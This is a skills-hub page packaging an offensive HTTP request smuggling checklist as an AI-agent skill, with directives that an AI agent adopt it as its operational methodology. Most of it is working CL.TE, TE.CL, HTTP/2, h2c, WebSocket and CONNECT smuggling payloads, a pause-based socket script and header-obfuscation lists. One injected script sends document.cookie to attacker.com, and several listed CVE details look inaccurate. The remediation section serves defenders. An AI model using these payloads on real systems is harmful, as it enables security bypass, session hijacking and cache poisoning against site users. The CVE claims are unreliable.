install
source · Clone the upstream repo
git clone https://github.com/ComeOnOliver/skillshub
Claude Code · Install into ~/.claude/skills/
T=$(mktemp -d) && git clone --depth=1 https://github.com/ComeOnOliver/skillshub "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/SnailSploit/Claude-Red/offensive-request-smuggling" ~/.claude/skills/comeonoliver-skillshub-offensive-request-smuggling && rm -rf "$T"
manifest:
skills/SnailSploit/Claude-Red/offensive-request-smuggling/SKILL.mdsource content
SKILL: HTTP Request Smuggling
Metadata
- Skill Name: request-smuggling
- Folder: offensive-request-smuggling
- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/req-smuggle.md
Description
HTTP request smuggling checklist: CL.TE, TE.CL, TE.TE variants, detection with timing and differential responses, WAF bypass, cache poisoning, credential hijacking, and request smuggling via HTTP/2. Use when testing reverse proxy/load balancer configurations.
Trigger Phrases
Use this skill when the conversation involves any of:
request smuggling, HTTP smuggling, CL.TE, TE.CL, TE.TE, HTTP/2 smuggling, cache poisoning, WAF bypass, differential response, smuggling detection, proxy desyncInstructions for Claude
When this skill is active:
- Load and apply the full methodology below as your operational checklist
- Follow steps in order unless the user specifies otherwise
- For each technique, consider applicability to the current target/context
- Track which checklist items have been completed
- Suggest next steps based on findings
Full Methodology
HTTP Request Smuggling
Mechanisms
HTTP Request Smuggling is a vulnerability that occurs when front-end and back-end servers interpret HTTP requests differently, leading to a desynchronization in the HTTP request processing chain. This desynchronization allows attackers to "smuggle" requests to the back-end server, potentially bypassing security controls or manipulating how other users' requests are processed.
graph TD A[Client] -->|HTTP Request| B[Front-end Server] B -->|Interpreted Request| C[Back-end Server] B -->|Different Interpretation| D[Desynchronization] D -->|Smuggled Request| C D -->|Security Bypass| E[Unauthorized Access] D -->|Queue Poisoning| F[Response Hijacking]
Request smuggling vulnerabilities arise from inconsistencies in how servers parse and interpret HTTP messages, particularly regarding:
- Transfer-Encoding (TE) header: Indicates chunked encoding
- Content-Length (CL) header: Specifies the length of the message body
- Header parsing: Different handling of whitespace, newlines, and malformed headers
Common desynchronization scenarios include:
- CL.TE: Front-end uses Content-Length, back-end uses Transfer-Encoding
- TE.CL: Front-end uses Transfer-Encoding, back-end uses Content-Length
- TE.TE: Both servers use Transfer-Encoding but handle edge cases differently
HTTP/2/3 specific desync variants:
- H2.CL / H2.TE: Conflicts between HTTP/2 body length signaling and HTTP/1 backends during downgrade.
- H2C Upgrade: Cleartext HTTP/2 (h2c) upgrade paths mishandled by intermediaries.
- Authority/Host Confusion:
vs:authority
normalization inconsistencies under CDNs.Host
graph LR subgraph "CL.TE Attack" A1[Client] -->|"POST / HTTP/1.1<br>Content-Length: 30<br>Transfer-Encoding: chunked<br><br>0<br><br>GET /admin HTTP/1.1<br>X-Ignore:"| B1[Front-end] B1 -->|"Uses Content-Length: 30<br>Sees one complete request"| C1[Back-end] C1 -->|"Uses Transfer-Encoding<br>Sees two requests:<br>1. POST /<br>2. GET /admin"| D1[Smuggled Request Processed] end
Modern variations include:
- H2.HTTP/1: HTTP/2 to HTTP/1 downgrades causing inconsistencies
- HTTP/1.H2: HTTP/1 to HTTP/2 transitions with different interpretations
- Timeout-based: Exploiting time differences in connection handling
- Method-based: Different interpretations of HTTP methods
- Header-based: Inconsistent header parsing between servers
Hunt
Identifying Vulnerable Applications
Architecture Reconnaissance
- Look for multi-server architectures with proxies, load balancers, or CDNs
- Identify systems using Nginx, HAProxy, Varnish, or Amazon ALB/CloudFront
- Check for HTTP/2 support with HTTP/1 backend compatibility
Basic Detection Tests
-
CL.TE Vulnerability Detection (Time Delay Example):
POST / HTTP/1.1 Host: vulnerable-website.com Transfer-Encoding: chunked Content-Length: 4 1 A XSend this request, then send a normal request. If the normal request experiences a time delay, CL.TE might be present.
-
TE.CL Vulnerability Detection (Time Delay Example):
POST / HTTP/1.1 Host: vulnerable-website.com Transfer-Encoding: chunked Content-Length: 6 0 XSend this request, then send a normal request. If the normal request experiences a time delay, TE.CL might be present.
-
CL.TE Confirmation (Example):
POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 6 Transfer-Encoding: chunked 0 GSend twice. The second response should indicate an unrecognized method like
.GPOST -
TE.CL Confirmation (Example): (Ensure Burp's "Update Content-Length" is unchecked)
POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0Send twice. The second request should show the effect of the smuggled
.GPOST -
TE.TE Desync Detection (Obfuscation Example): (Ensure Burp's "Update Content-Length" is unchecked)
POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0Send twice. The second request should show the effect of the smuggled
, confirming that one server ignored the obfuscatedGPOST
header.Transfer-encoding: cow
Advanced Detection Techniques
-
Differential Testing: Observe response timing differences
-
Time Delays: Add artificial delays between requests to detect queue interference
-
Obfuscation Testing: Try various obfuscation techniques:
Transfer-Encoding: xchunked Transfer-Encoding: chunked Transfer-Encoding : chunked Transfer-Encoding: chunked Transfer-Encoding: identity, chunked- HTTP/2 Specific: Duplicate
headers, mixed/malformed pseudo-headers, abnormal stream resets, header/continuation frame splitting.content-length
- HTTP/2 Specific: Duplicate
Testing Methodology
flowchart TD A[Initial Assessment] --> B{Vulnerability Detected?} B -->|Yes| C[Confirmation Testing] B -->|No| D[Try Advanced Techniques] D --> B C --> E{Confirmed?} E -->|Yes| F[Targeted Testing] E -->|No| D F --> G[Documentation & Exploitation] subgraph "Initial Assessment" A1[Test CL.TE Payloads] A2[Test TE.CL Payloads] A3[Check Header Obfuscation] end subgraph "Confirmation Testing" C1[Send Request with Clear Response] C2[Test Queue Poisoning] C3[Check Status Code Anomalies] end subgraph "Targeted Testing" F1[Test HTTP/2 Downgrade] F2[Check Header Oversizing] F3[Test Method Handling] end
-
Initial Assessment:
- Test standard CL.TE and TE.CL payloads
- Try header obfuscation techniques
- Check for timing inconsistencies
-
Confirmation Testing:
- Send a smuggled request that should trigger a distinct response
- Test for request queue poisoning by affecting subsequent requests
- Look for response status code anomalies
-
Targeted Testing:
- Test HTTP/2 downgrade scenarios
- Check for header oversizing vulnerabilities
- Test method-specific handling differences
Vulnerabilities
Common HTTP Request Smuggling Scenarios
mindmap root((HTTP Request Smuggling)) Security Control Bypass WAF Bypass Access Control Evasion Authentication Bypass Request/Response Queue Poisoning Request Hijacking Response Queue Poisoning Cache Poisoning Server-Specific Vulnerabilities Nginx-Specific Apache-Specific NodeJS-Specific Impact Session Hijacking Data Exposure XSS Injection Cache Poisoning Network Scanning Account Takeover
Security Control Bypass
- Web Application Firewall (WAF) Bypass: Smuggling malicious content past WAF inspection
- Access Control Evasion: Accessing restricted resources by smuggling authorized-looking requests
- Authentication Bypass: Manipulating authentication flows through request smuggling
Request/Response Queue Poisoning
- Request Hijacking: Capturing parts of another user's request including cookies or authentication tokens
- Response Queue Poisoning: Causing wrong responses to be sent to users
- Cache Poisoning: Injecting malicious content into caches serving multiple users
Server-Specific Vulnerabilities
- Nginx-Specific: Inconsistent
handling with underscore prefixesTransfer-Encoding - Apache-Specific: Different chunked encoding parser behavior
- NodeJS-Specific: Unique header parsing behavior with multiple headers
Impact Examples
- Session Hijacking: Stealing user session cookies through request smuggling
- Sensitive Data Exposure: Smuggling requests to internal resources
- Cross-Site Scripting (XSS): Injecting malicious scripts into responses sent to other users
- HTTP Cache Poisoning: Poisoning cached responses viewed by multiple users
- Internal Network Scanning: Using request smuggling for SSRF-like network scanning
- Account Takeover: Smuggling requests to change user credentials
Methodologies
Tools
- Burp Suite Professional: HTTP Request Smuggler extension (PortSwigger BApp Store)
- smuggler.py:
(defparam/smuggler, anshumanpattnaik/http-request-smuggling)python3 smuggler.py -u <URL> - tiscripts: Collection of scripts including smuggling checks (defparam/tiscripts)
- h2csmuggler:
(assetnote/h2csmuggler, BishopFox/h2csmuggler for HTTP/2)go run ./cmd/h2csmuggler check https://target.com/ http://localhost - Turbo Intruder: For advanced/customized request smuggling techniques in Burp Suite.
- Param Miner: For detecting hidden attack surfaces which might be vulnerable.
- h2spec / h3spec: Conformance testing for HTTP/2 and HTTP/3 implementations.
Testing Techniques
Basic Request Smuggling Test Patterns
-
CL.TE Pattern:
POST / HTTP/1.1 Host: vulnerable-website.com Content-Length: 39 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1 Host: vulnerable-website.com -
TE.CL Pattern:
POST / HTTP/1.1 Host: vulnerable-website.com Content-Length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 -
HTTP/2 Downgrade Pattern:
:method: POST :path: / :authority: vulnerable-website.com content-length: 0 content-length: 44 GET /admin HTTP/1.1 Host: vulnerable-website.com -
H2C Upgrade Smuggling Pattern:
GET / HTTP/1.1 Host: vulnerable-website.com Connection: Upgrade, HTTP2-Settings Upgrade: h2c HTTP2-Settings: AAMAAABkAAQAAP__ GET /admin HTTP/1.1 Host: vulnerable-website.com
Advanced Exploitation Techniques
-
Request Hijacking:
POST / HTTP/1.1 Host: vulnerable-website.com Content-Length: 50 Transfer-Encoding: chunked 0 GET / HTTP/1.1 Host: vulnerable-website.com -
Response Queue Poisoning:
POST / HTTP/1.1 Host: vulnerable-website.com Content-Length: 146 Transfer-Encoding: chunked 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 30 <html>Fake Response</html> -
WebSocket Hijacking:
POST / HTTP/1.1 Host: vulnerable-website.com Content-Length: 65 Transfer-Encoding: chunked 0 GET /socket HTTP/1.1 Upgrade: websocket Connection: Upgrade
Defense Testing
-
Testing Patch Effectiveness:
- Retest with various obfuscation techniques after patches
- Check for incomplete fixes or workarounds
-
Header Variations:
Transfer-Encoding: chunked transfer-encoding: chunked Transfer-Encoding:chunked Transfer-Encoding: identity,chunked Transfer-Encoding: identity, chunked -
Chunk Size Manipulation:
1\r\n A\r\n 0\r\n \r\n -
HTTP/2 Strictness Checks:
- Ensure single, consistent body length signaling; reject duplicate/malformed pseudo-headers.
- Disable or tightly control h2c upgrades at edges.
Real-World Exploitation Workflow
sequenceDiagram participant A as Attacker participant F as Front-end Server participant B as Back-end Server participant V as Victim A->>F: 1. Send Smuggling Payload F->>B: 2. First Request (Front-end interpretation) Note over F,B: Desynchronization Occurs A->>F: 3. Send Normal Request F->>B: 4. Second Request gets appended to smuggled content V->>F: 5. Victim sends innocent request F->>B: 6. Victim's request gets processed with attacker's content B->>F: 7. Modified response based on smuggled content F->>V: 8. Victim receives unexpected/malicious response
-
Identify Desync Vulnerability:
- Test CL.TE, TE.CL, TE.TE patterns
- Confirm with time-delay observations
-
Establish Attack Vector:
- Determine the most reliable desync method
- Identify the best obfuscation technique for the target
-
Craft Exploitation Payload:
- Create a request that smuggles another request
- Target sensitive functionality or information disclosure
-
Execute and Validate:
- Send the smuggled request
- Observe the effects on subsequent responses
-
Document Impact:
- Demonstrate real security implications
- Show how the vulnerability could affect users
Modern Desync Variants
HTTP/3 Desync
HTTP/3 uses QUIC transport which introduces new desync opportunities when proxies translate between HTTP/3 and HTTP/1.1:
HTTP/3 to HTTP/1.1 Translation:
# HTTP/3 request with duplicate headers :method: POST :path: /api/endpoint :authority: target.com content-length: 10 content-length: 50 # Backend may use different content-length value
Testing HTTP/3:
# Using curl with HTTP/3 curl --http3 https://target.com/endpoint -v # Check Alt-Svc header indicating HTTP/3 support curl -I https://target.com | grep -i alt-svc
QUIC Stream Manipulation:
- Multiple streams in single connection may be processed inconsistently
- Stream resets can leave partial data in backend queues
- QPACK header compression differences between implementations
Client-Side Desync (CSD)
Client-side desync exploits browser behavior to poison the browser's own connection pool, affecting subsequent requests from the same client.
Mechanism:
- Attacker crafts response that browser caches
- Response includes smuggled request
- Next victim request gets poisoned response
Example CSD Attack:
POST / HTTP/1.1 Host: vulnerable.com Content-Length: 150 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1 Host: vulnerable.com Content-Length: 10 x= GET /static/innocent.js HTTP/1.1 Host: vulnerable.com
Browser receives:
HTTP/1.1 200 OK Content-Length: 100 <script> // Malicious JavaScript injected into cached response document.location='http://attacker.com/steal?cookie='+document.cookie; </script>
Testing for CSD:
- Send smuggling payload
- Open same site in new tab
- Check if subsequent request receives smuggled response
- Look for
orAge
headers indicating cache hitX-Cache
High-Value Targets:
- JavaScript files (cached and executed)
- CSS files (for exfiltration via background-image)
- JSON API responses (manipulate application state)
WebSocket Desync
WebSocket upgrade process can be vulnerable to request smuggling:
WebSocket Upgrade Smuggling:
POST / HTTP/1.1 Host: vulnerable.com Content-Length: 200 Transfer-Encoding: chunked 0 GET /chat HTTP/1.1 Host: vulnerable.com Upgrade: websocket Connection: Upgrade Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ== Sec-WebSocket-Version: 13 Sec-WebSocket-Protocol: attacker-injection
Smuggling After WebSocket Establishment:
# Send via established WebSocket connection GET /admin HTTP/1.1 Host: vulnerable.com Cookie: admin_session=stolen_token
WebSocket Frame Manipulation:
- Inject malicious frames during upgrade
- Exploit frame fragmentation handling differences
- Target WebSocket proxies (nginx, HAProxy) that may parse differently
Testing Steps:
- Initiate WebSocket upgrade with smuggling payload
- Monitor if backend processes smuggled HTTP request
- Check WebSocket frames for injected content
- Test multiple simultaneous upgrade requests
Request Tunneling via CONNECT
CONNECT method can be abused for request smuggling:
CONNECT internal.service:80 HTTP/1.1 Host: vulnerable-proxy.com GET /admin HTTP/1.1 Host: internal.service Authorization: Bearer stolen_token
Testing:
- Send CONNECT request to proxy
- Include smuggled request in CONNECT body
- Check if proxy forwards to internal service
Pause-Based Desync
Exploiting TCP flow control and timing:
import socket import time s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('vulnerable.com', 80)) # Send headers slowly s.send(b'POST / HTTP/1.1\r\n') time.sleep(2) s.send(b'Host: vulnerable.com\r\n') time.sleep(2) s.send(b'Content-Length: 50\r\n') s.send(b'Transfer-Encoding: chunked\r\n\r\n') # Send smuggled request s.send(b'0\r\n\r\nGET /admin HTTP/1.1\r\n') s.send(b'Host: vulnerable.com\r\n\r\n')
Header Oversizing
Exploit differences in maximum header sizes:
POST / HTTP/1.1 Host: vulnerable.com X-Padding: AAAA[... 8KB of data ...] Content-Length: 100 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1
If front-end accepts larger headers than backend, backend may miss headers after cutoff point.
Detection Bypass Techniques (Advanced)
Header Name Obfuscation:
Transfer-Encoding : chunked # Space before colon Transfer-Encoding\t: chunked # Tab Transfer\rEncoding: chunked # Carriage return Transfer\x00Encoding: chunked # Null byte (rare) Transfer\x0bEncoding: chunked # Vertical tab
Multiple Content-Length Variations:
Content-Length: 10 Content-Length: 20 Content-length: 30 # Case variation CONTENT-LENGTH: 40 # Uppercase Content-Length : 50 # Space before colon
HTTP/2 Pseudo-Header Smuggling:
:method: POST :path: / :authority: target.com :method: GET # Duplicate pseudo-header content-length: 0 content-length: 50 # Duplicate content-length
Transfer-Encoding Value Pollution:
Transfer-Encoding: chunked, identity Transfer-Encoding: identity, chunked Transfer-Encoding: chunked;q=1 Transfer-Encoding: chunked\x20\x20 Transfer-Encoding: chunked\x0d\x0a
Real-World CVEs
-
CVE-2023-45853 - MiniZinc HTTP Parser:
- Request smuggling via Transfer-Encoding handling
- Impact: RCE via smuggled requests
-
CVE-2023-38545 - curl SOCKS5 Heap Overflow:
- Related to connection reuse that could enable smuggling
- Impact: RCE in certain configurations
-
CVE-2022-31629 - PHP HTTP Response Splitting:
- Response splitting enabling smuggling attacks
- Impact: XSS and cache poisoning
-
CVE-2021-41773 - Apache HTTP Server Path Traversal:
- Could be chained with request smuggling
- Impact: RCE via CGI script access
-
CVE-2020-11724 - Varnish Cache HTTP/2 Desync:
- HTTP/2 to HTTP/1.1 downgrade desync
- Impact: Cache poisoning and request smuggling
Remediation Recommendations
- Consistent Request Parsing: Ensure consistent parsing rules across all servers
- HTTP/2 Isolation: Avoid translating between HTTP/2 and HTTP/1.1 where possible
- Header Validation: Implement strict header validation
- Connection Resets: Reset connections after each request when possible
- WAF Rules: Configure WAF to detect request smuggling attempts
- Content-Length Validation: Ensure Content-Length matches actual content
- Chunked Encoding Validation: Implement proper chunked encoding parsing
- Regular Security Testing: Perform request smuggling-specific security tests
- Unified Parser: Use a single RFC-compliant parsing library across front/back tiers; normalize
/Host:authority - Gateway Hardening: Strip hop-by-hop/duplicate headers; disable TE other than
; enforce single message framing signalchunked - HTTP/3 Controls: Ensure QUIC implementation correctly handles stream management and header compression
- WebSocket Security: Validate WebSocket upgrade requests; sanitize Sec-WebSocket-* headers; limit concurrent upgrades
- Client-Side Desync Prevention: Set
on sensitive responses; use HTTP/2 exclusively; implement strict cache controlsConnection: close - Monitoring: Log anomalous header patterns; alert on multiple Content-Length or Transfer-Encoding headers; track connection reuse metrics